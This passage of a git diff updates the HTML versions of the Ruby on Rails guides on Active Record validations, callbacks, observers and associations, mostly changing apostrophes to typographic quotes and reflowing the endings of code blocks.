     :message => "Should happen once per year"
-end
-
-

There is also a :case_sensitive option that you can use to define if the uniqueness contraint will be case sensitive or not. This option defaults to true.

+end +

There is also a :case_sensitive option that you can use to define if the uniqueness contraint will be case sensitive or not. This option defaults to true.

class Person < ActiveRecord::Base
   validates_uniqueness_of :name, :case_sensitive => false
-end
-
-

The default error message for validates_uniqueness_of is "has already been taken".

+end +

The default error message for validates_uniqueness_of is "has already been taken".

4. Common validation options

-

There are some common options that all the validation helpers can use. Here they are, except for the :if and :unless options, which we'll cover right at the next topic.

+

There are some common options that all the validation helpers can use. Here they are, except for the :if and :unless options, which we’ll cover right at the next topic.

4.1. The :allow_nil option

-

You may use the :allow_nil option everytime you want to trigger a validation only if the value being validated is not nil. You may be asking yourself if it makes any sense to use :allow_nil and validates_presence_of together. Well, it does. Remember, validation will be skipped only for nil attributes, but empty strings are not considered nil.

+

You may use the :allow_nil option everytime you want to trigger a validation only if the value being validated is not nil. You may be asking yourself if it makes any sense to use :allow_nil and validates_presence_of together. Well, it does. Remember, validation will be skipped only for nil attributes, but empty strings are not considered nil.

class Coffee < ActiveRecord::Base
   validates_inclusion_of :size, :in => %w(small medium large),
     :message => "%s is not a valid size", :allow_nil => true
-end
-
+end

4.2. The :message option

-

As stated before, the :message option lets you specify the message that will be added to the errors collection when validation fails. When this option is not used, Active Record will use the respective default error message for each validation helper.

+

As stated before, the :message option lets you specify the message that will be added to the errors collection when validation fails. When this option is not used, Active Record will use the respective default error message for each validation helper.

4.3. The :on option

-

As stated before, the :on option lets you specify when the validation should happen. The default behaviour for all the built-in validation helpers is to be ran on save (both when you're creating a new record and when you're updating it). If you want to change it, you can use :on => :create to run the validation only when a new record is created or :on => :update to run the validation only when a record is updated.

+

As stated before, the :on option lets you specify when the validation should happen. The default behaviour for all the built-in validation helpers is to be ran on save (both when you’re creating a new record and when you’re updating it). If you want to change it, you can use :on => :create to run the validation only when a new record is created or :on => :update to run the validation only when a record is updated.

# => the default validates_presence_of :name, :on => :save -end -
+end

5. Conditional validation

-

Sometimes it will make sense to validate an object just when a given predicate is satisfied. You can do that by using the :if and :unless options, which can take a symbol, a string or a Ruby Proc. You may use the :if option when you want to specify when the validation should happen. If you want to specify when the validation should not happen, then you may use the :unless option.

+

Sometimes it will make sense to validate an object just when a given predicate is satisfied. You can do that by using the :if and :unless options, which can take a symbol, a string or a Ruby Proc. You may use the :if option when you want to specify when the validation should happen. If you want to specify when the validation should not happen, then you may use the :unless option.

5.1. Using a symbol with the :if and :unless options

-

You can associated the :if and :unless options with a symbol corresponding to the name of a method that will get called right before validation happens. This is the most commonly used option.

+

You can associated the :if and :unless options with a symbol corresponding to the name of a method that will get called right before validation happens. This is the most commonly used option.

def paid_with_card? payment_type == "card" end -end -
+end

5.2. Using a string with the :if and :unless options

-

You can also use a string that will be evaluated using :eval and needs to contain valid Ruby code. You should use this option only when the string represents a really short condition.

+

You can also use a string that will be evaluated using :eval and needs to contain valid Ruby code. You should use this option only when the string represents a really short condition.

class Person < ActiveRecord::Base
   validates_presence_of :surname, :if => "name.nil?"
-end
-
+end

5.3. Using a Proc object with the :if and :unless options

-

Finally, it's possible to associate :if and :unless with a Ruby Proc object which will be called. Using a Proc object can give you the hability to write a condition that will be executed only when the validation happens and not when your code is loaded by the Ruby interpreter. This option is best suited when writing short validation methods, usually one-liners.

+

Finally, it’s possible to associate :if and :unless with a Ruby Proc object which will be called. Using a Proc object can give you the hability to write a condition that will be executed only when the validation happens and not when your code is loaded by the Ruby interpreter. This option is best suited when writing short validation methods, usually one-liners.

class Account < ActiveRecord::Base
   validates_confirmation_of :password,
     :unless => Proc.new { |a| a.password.blank? }
-end
-
+end

6. Writing your own validation methods

-

When the built-in validation helpers are not enough for your needs, you can write your own validation methods, by implementing one or more of the validate, validate_on_create or validate_on_update methods. As the names of the methods states, the right method to implement depends on when you want the validations to be ran. The meaning of valid is still the same: to make an object invalid you just need to add a message to it's errors collection.

+

When the built-in validation helpers are not enough for your needs, you can write your own validation methods, by implementing one or more of the validate, validate_on_create or validate_on_update methods. As the names of the methods states, the right method to implement depends on when you want the validations to be ran. The meaning of valid is still the same: to make an object invalid you just need to add a message to it’s errors collection.

errors.add(:expiration_date, "can't be in the past") if !expiration_date.blank? and expiration_date < Date.today end -end -
-

If your validation rules are too complicated and you want to break them in small methods, you can implement all of them and call one of validate, validate_on_create or validate_on_update methods, passing it the symbols for the methods' names.

+end
+

If your validation rules are too complicated and you want to break them in small methods, you can implement all of them and call one of validate, validate_on_create or validate_on_update methods, passing it the symbols for the methods' names.

errors.add(:discount, "can't be greater than total value") unless discount <= total_value end -end -
+end

7. Using the errors collection

-

You can do more than just call valid? upon your objects based on the existance of the errors collection. Here is a list of the other available methods that you can use to manipulate errors or ask for an object's state.

-
    +

    You can do more than just call valid? upon your objects based on the existance of the errors collection. Here is a list of the other available methods that you can use to manipulate errors or ask for an object’s state.

    +
    • -add_to_base lets you add errors messages that are related to the object's state as a whole, instead of being related to a specific attribute. You can use this method when you want to say that the object is invalid, no matter the values of it's attributes. add_to_base receives a string with the message. +add_to_base lets you add errors messages that are related to the object’s state as a whole, instead of being related to a specific attribute. You can use this method when you want to say that the object is invalid, no matter the values of it’s attributes. add_to_base receives a string with the message.

    @@ -826,9 +801,8 @@ http://www.gnu.org/software/src-highlite --> def a_method_used_for_validation_purposes errors.add_to_base("This person is invalid because ...") end -end -
-
+
-
+
-
+
-
+
@@ -922,16 +893,15 @@ person.errors.< person.errors.empty? # => true p.save # => false p.errors.on(:name) -# => ["can't be blank", "is too short (minimum is 3 characters)"] - +# => ["can't be blank", "is too short (minimum is 3 characters)"]

8. Callbacks

-

Callbacks are methods that get called at certain moments of an object's lifecycle. With callbacks it's possible to write code that will run whenever an Active Record object is created, saved, updated, deleted or loaded from the database.

+

Callbacks are methods that get called at certain moments of an object’s lifecycle. With callbacks it’s possible to write code that will run whenever an Active Record object is created, saved, updated, deleted or loaded from the database.

8.1. Callbacks registration

-

In order to use the available callbacks, you need to registrate them. There are two ways of doing that.

+

In order to use the available callbacks, you need to registrate them. There are two ways of doing that.

8.2. Registering callbacks by overriding the callback methods

-

You can specify the callback method directly, by overriding it. Let's see how it works using the before_validation callback, which will surprisingly run right before any validation is done.

+

You can specify the callback method directly, by overriding it. Let’s see how it works using the before_validation callback, which will surprisingly run right before any validation is done.

self.login = email unless email.blank? end end -end -
+end

8.3. Registering callbacks by using macro-style class methods

-

The other way you can register a callback method is by implementing it as an ordinary method, and then using a macro-style class method to register it as a callback. The last example could be written like that:

+

The other way you can register a callback method is by implementing it as an ordinary method, and then using a macro-style class method to register it as a callback. The last example could be written like that:

self.login = email unless email.blank? end end -end -
-

The macro-style class methods can also receive a block. Rails best practices say that you should only use this style of registration if the code inside your block is so short that it fits in just one line.

+end +

The macro-style class methods can also receive a block. Rails best practices say that you should only use this style of registration if the code inside your block is so short that it fits in just one line.

validates_presence_of :login, :email before_create {|user| user.name = user.login.capitalize if user.name.blank?} -end -
-

In Rails, the preferred way of registering callbacks is by using macro-style class methods. The main advantages of using macro-style class methods are:

-
    +end
+

In Rails, the preferred way of registering callbacks is by using macro-style class methods. The main advantages of using macro-style class methods are:

+
  • You can add more than one method for each type of callback. Those methods will be queued for execution at the same order they were registered. @@ -1004,9 +971,9 @@ Readability, since your callback declarations will live at the beggining of your

9. Available callbacks

-

Here is a list with all the available Active Record callbacks, listed in the same order in which they will get called during the respective operations.

+

Here is a list with all the available Active Record callbacks, listed in the same order in which they will get called during the respective operations.

9.1. Callbacks called both when creating or updating a record.

-
    +
    • before_validation @@ -1034,7 +1001,7 @@ Readability, since your callback declarations will live at the beggining of your

    9.2. Callbacks called only when creating a new record.

    -
      +
      • before_validation_on_create @@ -1062,7 +1029,7 @@ Readability, since your callback declarations will live at the beggining of your

      9.3. Callbacks called only when updating an existing record.

      -
        +
        • before_validation_on_update @@ -1090,7 +1057,7 @@ Readability, since your callback declarations will live at the beggining of your

        9.4. Callbacks called when removing a record from the database.

        -
          +
          • before_destroy @@ -1107,20 +1074,20 @@ Readability, since your callback declarations will live at the beggining of your

          -

          The before_destroy and after_destroy callbacks will only be called if you delete the model using either the destroy instance method or one of the destroy or destroy_all class methods of your Active Record class. If you use delete or delete_all no callback operations will run, since Active Record will not instantiate any objects, accessing the records to be deleted directly in the database.

          +

          The before_destroy and after_destroy callbacks will only be called if you delete the model using either the destroy instance method or one of the destroy or destroy_all class methods of your Active Record class. If you use delete or delete_all no callback operations will run, since Active Record will not instantiate any objects, accessing the records to be deleted directly in the database.

          9.5. The after_initialize and after_find callbacks

          -

          The after_initialize callback will be called whenever an Active Record object is instantiated, either by direcly using new or when a record is loaded from the database. It can be useful to avoid the need to directly override your Active Record initialize method.

          -

          The after_find callback will be called whenever Active Record loads a record from the database. When used together with after_initialize it will run first, since Active Record will first read the record from the database and them create the model object that will hold it.

          -

          The after_initialize and after_find callbacks are a bit different from the others, since the only way to register those callbacks is by defining them as methods. If you try to register after_initialize or after_find using macro-style class methods, they will just be ignored. This behaviour is due to performance reasons, since after_initialize and after_find will both be called for each record found in the database, significantly slowing down the queries.

          +

          The after_initialize callback will be called whenever an Active Record object is instantiated, either by direcly using new or when a record is loaded from the database. It can be useful to avoid the need to directly override your Active Record initialize method.

          +

          The after_find callback will be called whenever Active Record loads a record from the database. When used together with after_initialize it will run first, since Active Record will first read the record from the database and them create the model object that will hold it.

          +

          The after_initialize and after_find callbacks are a bit different from the others, since the only way to register those callbacks is by defining them as methods. If you try to register after_initialize or after_find using macro-style class methods, they will just be ignored. This behaviour is due to performance reasons, since after_initialize and after_find will both be called for each record found in the database, significantly slowing down the queries.

        10. Halting Execution

        -

        As you start registering new callbacks for your models, they will be queued for execution. This queue will include all your model's validations, the registered callbacks and the database operation to be executed. However, if at any moment one of the before_create, before_save, before_update or before_destroy callback methods returns a boolean false (not nil) value, this execution chain will be halted and the desired operation will not complete: your model will not get persisted in the database, or your records will not get deleted and so on.

        +

        As you start registering new callbacks for your models, they will be queued for execution. This queue will include all your model’s validations, the registered callbacks and the database operation to be executed. However, if at any moment one of the before_create, before_save, before_update or before_destroy callback methods returns a boolean false (not nil) value, this execution chain will be halted and the desired operation will not complete: your model will not get persisted in the database, or your records will not get deleted and so on.

        11. Callback classes

        -

        Sometimes the callback methods that you'll write will be useful enough to be reused at other models. Active Record makes it possible to create classes that encapsulate the callback methods, so it becomes very easy to reuse them.

        -

        Here's an example where we create a class with a after_destroy callback for a PictureFile model.

        +

        Sometimes the callback methods that you’ll write will be useful enough to be reused at other models. Active Record makes it possible to create classes that encapsulate the callback methods, so it becomes very easy to reuse them.

        +

        Here’s an example where we create a class with a after_destroy callback for a PictureFile model.

        def after_destroy(picture_file) File.delete(picture_file.filepath) if File.exists?(picture_file.filepath) end -end -
        -

        When declared inside a class the callback method will receive the model object as a parameter. We can now use it this way:

        +end
      +

      When declared inside a class the callback method will receive the model object as a parameter. We can now use it this way:

      class PictureFile < ActiveRecord::Base
         after_destroy PictureFileCallbacks.new
      -end
      -
      -

      Note that we needed to instantiate a new PictureFileCallbacks object, since we declared our callback as an instance method. Sometimes it will make more sense to have it as a class method.

      +end
+

Note that we needed to instantiate a new PictureFileCallbacks object, since we declared our callback as an instance method. Sometimes it will make more sense to have it as a class method.

def self.after_destroy(picture_file) File.delete(picture_file.filepath) if File.exists?(picture_file.filepath) end -end -
-

If the callback method is declared this way, it won't be necessary to instantiate a PictureFileCallbacks object.

+end
+

If the callback method is declared this way, it won’t be necessary to instantiate a PictureFileCallbacks object.

class PictureFile < ActiveRecord::Base
   after_destroy PictureFileCallbacks
-end
-
-

You can declare as many callbacks as you want inside your callback classes.

+end +

You can declare as many callbacks as you want inside your callback classes.

12. Observers

-

Active Record callbacks are a powerful feature, but they can pollute your model implementation with code that's not directly related to the model's purpose. In object-oriented software, it's always a good idea to design your classes with a single responsability in the whole system. For example, it wouldn't make much sense to have a User model with a method that writes data about a login attempt to a log file. Whenever you're using callbacks to write code that's not directly related to your model class purposes, it may be a good moment to create an Observer.

-

An Active Record Observer is an object that links itself to a model and register it's methods for callbacks. Your model's implementation remain clean, while you can reuse the code in the Observer to add behaviuor to more than one model class. Ok, you may say that we can also do that using callback classes, but it would still force us to add code to our model's implementation.

-

Observer classes are subclasses of the ActiveRecord::Observer class. When this class is subclassed, Active Record will look at the name of the new class and then strip the Observer part to find the name of the Active Record class to observe.

-

Consider a Registration model, where we want to send an email everytime a new registration is created. Since sending emails is not directly related to our model's purpose, we could create an Observer to do just that:

+

Active Record callbacks are a powerful feature, but they can pollute your model implementation with code that’s not directly related to the model’s purpose. In object-oriented software, it’s always a good idea to design your classes with a single responsability in the whole system. For example, it wouldn’t make much sense to have a User model with a method that writes data about a login attempt to a log file. Whenever you’re using callbacks to write code that’s not directly related to your model class purposes, it may be a good moment to create an Observer.

+

An Active Record Observer is an object that links itself to a model and register it’s methods for callbacks. Your model’s implementation remain clean, while you can reuse the code in the Observer to add behaviuor to more than one model class. Ok, you may say that we can also do that using callback classes, but it would still force us to add code to our model’s implementation.

+

Observer classes are subclasses of the ActiveRecord::Observer class. When this class is subclassed, Active Record will look at the name of the new class and then strip the Observer part to find the name of the Active Record class to observe.

+

Consider a Registration model, where we want to send an email everytime a new registration is created. Since sending emails is not directly related to our model’s purpose, we could create an Observer to do just that:

def after_create(model) # code to send registration confirmation emails... end -end -
-

Like in callback classes, the observer's methods receive the observed model as a parameter.

-

Sometimes using the ModelName + Observer naming convention won't be the best choice, mainly when you want to use the same observer for more than one model class. It's possible to explicity specify the models that our observer should observe.

+end
+

Like in callback classes, the observer’s methods receive the observed model as a parameter.

+

Sometimes using the ModelName + Observer naming convention won’t be the best choice, mainly when you want to use the same observer for more than one model class. It’s possible to explicity specify the models that our observer should observe.

class Auditor < ActiveRecord::Observer
   observe User, Registration, Invoice
-end
-
+end

12.1. Registering observers

-

If you payed attention, you may be wondering where Active Record Observers are referenced in our applications, so they get instantiate and begin to interact with our models. For observers to work we need to register them somewhere. The usual place to do that is in our application's config/environment.rb file. In this file there is a commented out line where we can define the observers that our application should load at start-up.

+

If you payed attention, you may be wondering where Active Record Observers are referenced in our applications, so they get instantiate and begin to interact with our models. For observers to work we need to register them somewhere. The usual place to do that is in our application’s config/environment.rb file. In this file there is a commented out line where we can define the observers that our application should load at start-up.

# Activate observers that should always be running
-config.active_record.observers = :registration_observer, :auditor
-
-

You can uncomment the line with config.active_record.observers and change the symbols for the name of the observers that should be registered.

-

It's also possible to register callbacks in any of the files living at config/environments/, if you want an observer to work only in a specific environment. There is not a config.active_record.observers line at any of those files, but you can simply add it.

+config.active_record.observers = :registration_observer, :auditor +

You can uncomment the line with config.active_record.observers and change the symbols for the name of the observers that should be registered.

+

It’s also possible to register callbacks in any of the files living at config/environments/, if you want an observer to work only in a specific environment. There is not a config.active_record.observers line at any of those files, but you can simply add it.

12.2. Where to put the observers' source files

-

By convention, you should always save your observers' source files inside app/models.

+

By convention, you should always save your observers' source files inside app/models.

13. Changelog

diff --git a/railties/doc/guides/html/association_basics.html b/railties/doc/guides/html/association_basics.html index a2f89e3c43..336fa4255b 100644 --- a/railties/doc/guides/html/association_basics.html +++ b/railties/doc/guides/html/association_basics.html @@ -269,8 +269,8 @@ ul#navMain {

A Guide to Active Record Associations

-

This guide covers the association features of Active Record. By referring to this guide, you will be able to:

-
    +

    This guide covers the association features of Active Record. By referring to this guide, you will be able to:

    +
    • Declare associations between Active Record models @@ -291,7 +291,7 @@ Use the methods added to your models by creating associations

    1. Why Associations?

    -

    Why do we need associations between models? Because they make common operations simpler and easier in your code. For example, consider a simple Rails application that includes a model for customers and a model for orders. Each customer can have many orders. Without associations, the model declarations would look like this:

    +

    Why do we need associations between models? Because they make common operations simpler and easier in your code. For example, consider a simple Rails application that includes a model for customers and a model for orders. Each customer can have many orders. Without associations, the model declarations would look like this:

    end class Order < ActiveRecord::Base -end -
    -

    Now, suppose we wanted to add a new order for an existing customer. We'd need to do something like this:

    +end
+

Now, suppose we wanted to add a new order for an existing customer. We’d need to do something like this:

-
@order = Order.create(:order_date => Time.now, :customer_id => @customer.id)
-
-

Or consider deleting a customer, and ensuring that all of its orders get deleted as well:

+
@order = Order.create(:order_date => Time.now, :customer_id => @customer.id)
+

Or consider deleting a customer, and ensuring that all of its orders get deleted as well:

@orders.each do |order| order.destroy end -@customer.destroy -
-

With Active Record associations, we can streamline these - and other - operations by declaratively telling Rails that there is a connection between the two models. Here's the revised code for setting up customers and orders:

+@customer.destroy +

With Active Record associations, we can streamline these - and other - operations by declaratively telling Rails that there is a connection between the two models. Here’s the revised code for setting up customers and orders:

class Order < ActiveRecord::Base belongs_to :customer -end -
-

With this change, creating a new order for a particular customer is easier:

+end +

With this change, creating a new order for a particular customer is easier:

-
@order = @customer.orders.create(:order_date => Time.now)
-
-

Deleting a customer and all of its orders is much easier:

+
@order = @customer.orders.create(:order_date => Time.now)
+

Deleting a customer and all of its orders is much easier:

-
@customer.destroy
-
-

To learn more about the different types of associations, read the next section of this Guide. That's followed by some tips and tricks for working with associations, and then by a complete reference to the methods and options for associations in Rails.

+
@customer.destroy
+

To learn more about the different types of associations, read the next section of this Guide. That’s followed by some tips and tricks for working with associations, and then by a complete reference to the methods and options for associations in Rails.

2. The Types of Associations

-

In Rails, an association is a connection between two Active Record models. Associations are implemented using macro-style calls, so that you can declaratively add features to your models. For example, by declaring that one model belongs_to another, you instruct Rails to maintain Primary Key-Foreign Key information between instances of the two models, and you also get a number of utility methods added to your model. Rails supports six types of association:

-
    +

    In Rails, an association is a connection between two Active Record models. Associations are implemented using macro-style calls, so that you can declaratively add features to your models. For example, by declaring that one model belongs_to another, you instruct Rails to maintain Primary Key-Foreign Key information between instances of the two models, and you also get a number of utility methods added to your model. Rails supports six types of association:

    +
    • belongs_to @@ -390,9 +384,9 @@ http://www.gnu.org/software/src-highlite -->

    -

    In the remainder of this guide, you'll learn how to declare and use the various forms of associations. But first, a quick introduction to the situations where each association type is appropriate.

    +

    In the remainder of this guide, you’ll learn how to declare and use the various forms of associations. But first, a quick introduction to the situations where each association type is appropriate.

    2.1. The belongs_to Association

    -

    A belongs_to association sets up a one-to-one connection with another model, such that each instance of the declaring model "belongs to" one instance of the other model. For example, if your application includes customers and orders, and each order can be assigned to exactly one customer, you'd declare the order model this way:

    +

    A belongs_to association sets up a one-to-one connection with another model, such that each instance of the declaring model "belongs to" one instance of the other model. For example, if your application includes customers and orders, and each order can be assigned to exactly one customer, you’d declare the order model this way:

    class Order < ActiveRecord::Base
       belongs_to :customer
    -end
    -
    -

    +end

+

belongs_to Association Diagram

2.2. The has_one Association

-

A has_one association also sets up a one-to-one connection with another model, but with somewhat different semantics (and consequences). This association indicates that each instance of a model contains or possesses one instance of another model. For example, if each supplier in your application has only one account, you'd declare the supplier model like this:

+

A has_one association also sets up a one-to-one connection with another model, but with somewhat different semantics (and consequences). This association indicates that each instance of a model contains or possesses one instance of another model. For example, if each supplier in your application has only one account, you’d declare the supplier model like this:

class Supplier < ActiveRecord::Base
   has_one :account
-end
-
-

+end

+

has_one Association Diagram

2.3. The has_many Association

-

A has_many association indicates a one-to-many connection with another model. You'll often find this association on the "other side" of a belongs_to association. This association indicates that each instance of the model has zero or more instances of another model. For example, in an application containing customers and orders, the customer model could be declared like this:

+

A has_many association indicates a one-to-many connection with another model. You’ll often find this association on the "other side" of a belongs_to association. This association indicates that each instance of the model has zero or more instances of another model. For example, in an application containing customers and orders, the customer model could be declared like this:

class Customer < ActiveRecord::Base
   has_many :orders
-end
-
+end
@@ -438,11 +429,11 @@ http://www.gnu.org/software/src-highlite --> The name of the other model is pluralized when declaring a has_many association.
-

+

has_many Association Diagram

2.4. The has_many :through Association

-

A has_many :through association is often used to set up a many-to-many connection with another model. This association indicates that the declaring model can be matched with zero or more instances of another model by proceeding through a third model. For example, consider a medical practice where patients make appointments to see physicians. The relevant association declarations could look like this:

+

A has_many :through association is often used to set up a many-to-many connection with another model. This association indicates that the declaring model can be matched with zero or more instances of another model by proceeding through a third model. For example, consider a medical practice where patients make appointments to see physicians. The relevant association declarations could look like this:

class Patient < ActiveRecord::Base has_many :appointments has_many :physicians, :through => :appointments -end -
-

+end

+

has_many :through Association Diagram

-

The has_many :through association is also useful for setting up "shortcuts" through nested :has_many associations. For example, if a document has many sections, and a section has many paragraphs, you may sometimes want to get a simple collection of all paragraphs in the document. You could set that up this way:

+

The has_many :through association is also useful for setting up "shortcuts" through nested :has_many associations. For example, if a document has many sections, and a section has many paragraphs, you may sometimes want to get a simple collection of all paragraphs in the document. You could set that up this way:

class Paragraph < ActiveRecord::Base belongs_to :section -end -
+end

2.5. The has_one :through Association

-

A has_one :through association sets up a one-to-one connection with another model. This association indicates that the declaring model can be matched with one instance of another model by proceeding through a third model. For example, if each supplier has one account, and each account is associated with one account history, then the customer model could look like this:

+

A has_one :through association sets up a one-to-one connection with another model. This association indicates that the declaring model can be matched with one instance of another model by proceeding through a third model. For example, if each supplier has one account, and each account is associated with one account history, then the customer model could look like this:

class AccountHistory < ActiveRecord::Base belongs_to :account -end -
-

+end

+

has_one :through Association Diagram

2.6. The has_and_belongs_to_many Association

-

A has_and_belongs_to_many association creates a direct many-to-many connection with another model, with no intervening model. For example, if your application includes assemblies and parts, with each assembly having many parts and each part appearing in many assemblies, you could declare the models this way:

+

A has_and_belongs_to_many association creates a direct many-to-many connection with another model, with no intervening model. For example, if your application includes assemblies and parts, with each assembly having many parts and each part appearing in many assemblies, you could declare the models this way:

class Part < ActiveRecord::Base has_and_belongs_to_many :assemblies -end -
-

+end

+

has_and_belongs_to_many Association Diagram

2.7. Choosing Between belongs_to and has_one

-

If you want to set up a 1-1 relationship between two models, you'll need to add belongs_to to one, and has_one to the other. How do you know which is which?

-

The distinction is in where you place the foreign key (it goes on the table for the class declaring the belongs_to association), but you should give some thought to the actual meaning of the data as well. The has_one relationship says that one of something is yours - that is, that something points back to you. For example, it makes more sense to say that a supplier owns an account than that an account owns a supplier. This suggests that the correct relationships are like this:

+

If you want to set up a 1-1 relationship between two models, you’ll need to add belongs_to to one, and has_one to the other. How do you know which is which?

+

The distinction is in where you place the foreign key (it goes on the table for the class declaring the belongs_to association), but you should give some thought to the actual meaning of the data as well. The has_one relationship says that one of something is yours - that is, that something points back to you. For example, it makes more sense to say that a supplier owns an account than that an account owns a supplier. This suggests that the correct relationships are like this:

class Account < ActiveRecord::Base belongs_to :supplier -end -
-

The corresponding migration might look like this:

+end +

The corresponding migration might look like this:

drop_table :accounts drop_table :suppliers end -end -
+end
@@ -579,7 +564,7 @@ http://www.gnu.org/software/src-highlite -->

2.8. Choosing Between has_many :through and has_and_belongs_to_many

-

Rails offers two different ways to declare a many-to-many relationship between models. The simpler way is to use has_and_belongs_to_many, which allows you to make the association directly:

+

Rails offers two different ways to declare a many-to-many relationship between models. The simpler way is to use has_and_belongs_to_many, which allows you to make the association directly:

class Part < ActiveRecord::Base has_and_belongs_to_many :assemblies -end -
-

The second way to declare a many-to-many relationship is to use has_many :through. This makes the association indirectly, through a join model:

+end +

The second way to declare a many-to-many relationship is to use has_many :through. This makes the association indirectly, through a join model:

class Part < ActiveRecord::Base has_many :manifests has_many :assemblies, :through => :manifests -end -
-

The simplest rule of thumb is that you should set up a has_many :through relationship if you need to work with the relationship model as an independent entity. If you don't need to do anything with the relationship model, it may be simpler to set up a has_and_belongs_to_many relationship (though you'll need to remember to create the joining table).

-

You should use has_many :through if you need validations, callbacks, or extra attributes on the join model.

+end +

The simplest rule of thumb is that you should set up a has_many :through relationship if you need to work with the relationship model as an independent entity. If you don’t need to do anything with the relationship model, it may be simpler to set up a has_and_belongs_to_many relationship (though you’ll need to remember to create the joining table).

+

You should use has_many :through if you need validations, callbacks, or extra attributes on the join model.

2.9. Polymorphic Associations

-

A slightly more advanced twist on associations is the polymorphic association. With polymorphic associations, a model can belong to more than one other model, on a single association. For example, you might have a picture model that belongs to either an employee model or a product model. Here's how this could be declared:

+

A slightly more advanced twist on associations is the polymorphic association. With polymorphic associations, a model can belong to more than one other model, on a single association. For example, you might have a picture model that belongs to either an employee model or a product model. Here’s how this could be declared:

class Product < ActiveRecord::Base has_many :pictures, :as => :imageable -end -
-

You can think of a polymorphic belongs_to declaration as setting up an interface that any other model can use. From an instance of the Employee model, you can retrieve a collection of pictures: @employee.pictures. Similarly, you can retrieve @product.pictures. If you have an instance of the Picture model, you can get to its parent via @picture.imageable. To make this work, you need to declare both a foreign key column and a type column in the model that declares the polymorphic interface:

+end +

You can think of a polymorphic belongs_to declaration as setting up an interface that any other model can use. From an instance of the Employee model, you can retrieve a collection of pictures: @employee.pictures. Similarly, you can retrieve @product.pictures. If you have an instance of the Picture model, you can get to its parent via @picture.imageable. To make this work, you need to declare both a foreign key column and a type column in the model that declares the polymorphic interface:

def self.down drop_table :pictures end -end -
-

This migration can be simplified by using the t.references form:

+end +

This migration can be simplified by using the t.references form:

def self.down drop_table :pictures end -end -
-

+end

+

Polymorphic Association Diagram

2.10. Self Joins

-

In designing a data model, you will sometimes find a model that should have a relation to itself. For example, you may want to store all employees in a single database model, but be able to trace relationships such as manager and subordinates. This situation can be modeled with self-joining associations:

+

In designing a data model, you will sometimes find a model that should have a relation to itself. For example, you may want to store all employees in a single database model, but be able to trace relationships such as manager and subordinates. This situation can be modeled with self-joining associations:

class Employee < ActiveRecord::Base
   has_many :subordinates, :class_name => "Employee", :foreign_key => "manager_id"
   belongs_to :manager, :class_name => "Employee"
-end
-
-

With this setup, you can retrieve @employee.subordinates and @employee.manager.

+end +

With this setup, you can retrieve @employee.subordinates and @employee.manager.

3. Tips, Tricks, and Warnings

-

Here are a few things you should know to make efficient use of Active Record associations in your Rails applications:

-
    +

    Here are a few things you should know to make efficient use of Active Record associations in your Rails applications:

    +
    • Controlling caching @@ -719,7 +698,7 @@ Controlling association scope

    3.1. Controlling Caching

    -

    All of the association methods are built around caching that keeps the result of the most recent query available for further operations. The cache is even shared across methods. For example:

    +

    All of the association methods are built around caching that keeps the result of the most recent query available for further operations. The cache is even shared across methods. For example:

    customer.orders                 # retrieves orders from the database
     customer.orders.size            # uses the cached copy of orders
    -customer.orders.empty?          # uses the cached copy of orders
    -
    -

    But what if you want to reload the cache, because data might have been changed by some other part of the application? Just pass true to the association call:

    +customer.orders.empty? # uses the cached copy of orders
+

But what if you want to reload the cache, because data might have been changed by some other part of the application? Just pass true to the association call:

customer.orders                 # retrieves orders from the database
 customer.orders.size            # uses the cached copy of orders
-customer.orders(true).empty?    # discards the cached copy of orders and goes back to the database
-
+customer.orders(true).empty? # discards the cached copy of orders and goes back to the database

3.2. Avoiding Name Collisions

-

You are not free to use just any name for your associations. Because creating an association adds a method with that name to the model, it is a bad idea to give an association a name that is already used for an instance method of ActiveRecord::Base. The association method would override the base method and break things. For instance, attributes or connection are bad names for associations.

+

You are not free to use just any name for your associations. Because creating an association adds a method with that name to the model, it is a bad idea to give an association a name that is already used for an instance method of ActiveRecord::Base. The association method would override the base method and break things. For instance, attributes or connection are bad names for associations.

3.3. Updating the Schema

-

Associations are extremely useful, but they are not magic. You are responsible for maintaining your database schema to match your associations. In practice, this means two things, depending on what sort of associations you are creating. For belongs_to associations you need to create foreign keys, and for has_and_belongs_to_many associations you need to create the appropriate join table.

+

Associations are extremely useful, but they are not magic. You are responsible for maintaining your database schema to match your associations. In practice, this means two things, depending on what sort of associations you are creating. For belongs_to associations you need to create foreign keys, and for has_and_belongs_to_many associations you need to create the appropriate join table.

3.3.1. Creating Foreign Keys for belongs_to Associations

-

When you declare a belongs_to association, you need to create foreign keys as appropriate. For example, consider this model:

+

When you declare a belongs_to association, you need to create foreign keys as appropriate. For example, consider this model:

class Order < ActiveRecord::Base
   belongs_to :customer
-end
-
-

This declaration needs to be backed up by the proper foreign key declaration on the orders table:

+end +

This declaration needs to be backed up by the proper foreign key declaration on the orders table:

def self.down drop_table :orders end -end -
-

If you create an association some time after you build the underlying model, you need to remember to create an add_column migration to provide the necessary foreign key.

+end +

If you create an association some time after you build the underlying model, you need to remember to create an add_column migration to provide the necessary foreign key.

3.3.2. Creating Join Tables for has_and_belongs_to_many Associations

-

If you create a has_and_belongs_to_many association, you need to explicitly create the joining table. Unless the name of the join table is explicitly specified by using the :join_table option, Active Record create the name by using the lexical order of the class names. So a join between customer and order models will give the default join table name of "customers_orders" because "c" outranks "o" in lexical ordering.

+

If you create a has_and_belongs_to_many association, you need to explicitly create the joining table. Unless the name of the join table is explicitly specified by using the :join_table option, Active Record create the name by using the lexical order of the class names. So a join between customer and order models will give the default join table name of "customers_orders" because "c" outranks "o" in lexical ordering.

@@ -785,7 +760,7 @@ http://www.gnu.org/software/src-highlite --> The precedence between model names is calculated using the < operator for String. This means that if the strings are of different lengths, and the strings are equal when compared up to the shortest length, then the longer string is considered of higher lexical precedence than the shorter one. For example, one would expect the tables "paper_boxes" and "papers" to generate a join table name of "papers_paper_boxes" because of the length of the name "paper_boxes", but it in fact generates a join table name of "paper_boxes_papers".
-

Whatever the name, you must manually generate the join table with an appropriate migration. For example, consider these associations:

+

Whatever the name, you must manually generate the join table with an appropriate migration. For example, consider these associations:

class Part < ActiveRecord::Base has_and_belongs_to_many :assemblies -end -
-

These need to be backed up by a migration to create the assemblies_parts table. This table should be created without a primary key:

+end +

These need to be backed up by a migration to create the assemblies_parts table. This table should be created without a primary key:

def self.down drop_table :assemblies_parts end -end -
+end

3.4. Controlling Association Scope

-

By default, associations look for objects only within the current module's scope. This can be important when you declare Active Record models within a module. For example:

+

By default, associations look for objects only within the current module’s scope. This can be important when you declare Active Record models within a module. For example:

belongs_to :supplier end end -end -
-

